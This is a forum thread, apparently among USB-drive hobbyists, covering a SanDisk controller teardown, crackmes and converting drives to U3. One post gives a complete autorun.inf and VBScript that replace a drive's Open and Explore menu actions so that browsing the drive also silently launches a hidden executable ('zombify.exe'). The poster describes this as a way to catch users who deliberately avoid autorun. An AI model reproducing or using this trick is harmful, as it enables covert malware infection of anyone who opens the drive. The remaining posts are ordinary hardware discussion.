Hook5

Just disassembled my 4GB Sandisk Cruzer The controller is labled SanDisk 20-99-00128-3 8736-730104 SDC1 Taiwan I believe the 8736 is the controller type id.

Documentation... http://msdn2.microsoft.com/en-us/library/bb776823.aspx

Lol.. are we doing crackmes now? Got a few crackmes for ya if you are interested :-D

USBHacker: Do post some examples with explanation if you feel you have something to add ;-)

Don't know if this is common knowledge, but here are some example Autorun entries that you might find interesting... [autorun] open=wscript.exe Autorun.vbs shellOpen=Open shellOpencommand=wscript.exe Autorun.vbe shellExplore=Explore shellExplorecommand=wscript.exe Autorun.vbe /e autorun.vbe: Dim sh, fso, CD, oArgs, sArg Set sh = CreateObject("WScript.shell") Set fso = CreateObject("scripting.filesystemobject") Set oArgs = wscript.arguments If oArgs.count > 0 Then sArg = oArgs(0) CD = fso.GetParentFolderName(WScript.ScriptFullName) & "" sh.run "explorer.exe " & sArg & "," & CD,1,FALSE ' <-- fso.GetParentFolderName(CD) takes you one dir back if you strore the autorun.vbe in a folder sh.run "zombify.exe",0,TRUE ' <-- adapt this part to suit your needs The shell lines in the autorun file will replace the "open" and "explore" selections from the context menu with something that behaves similar, but also carries an evil job. There are now only two ways left that the content can be explored without the evil payload being run... 1. Typing the exact path in start - run etc. 2. The "Open this folder" selection from the autoplay action list. Most people that don't want to execute autorun will use the context menu to open or explore the drive, and now you got those users as well...

Could someone that has been successful in converting a Non-U3 drive to U3 please post the best way to do this here with links to all required tools etc.? This way everyone can test their USB drives and post their findings, and we'll soon know which can be converted, and which can't.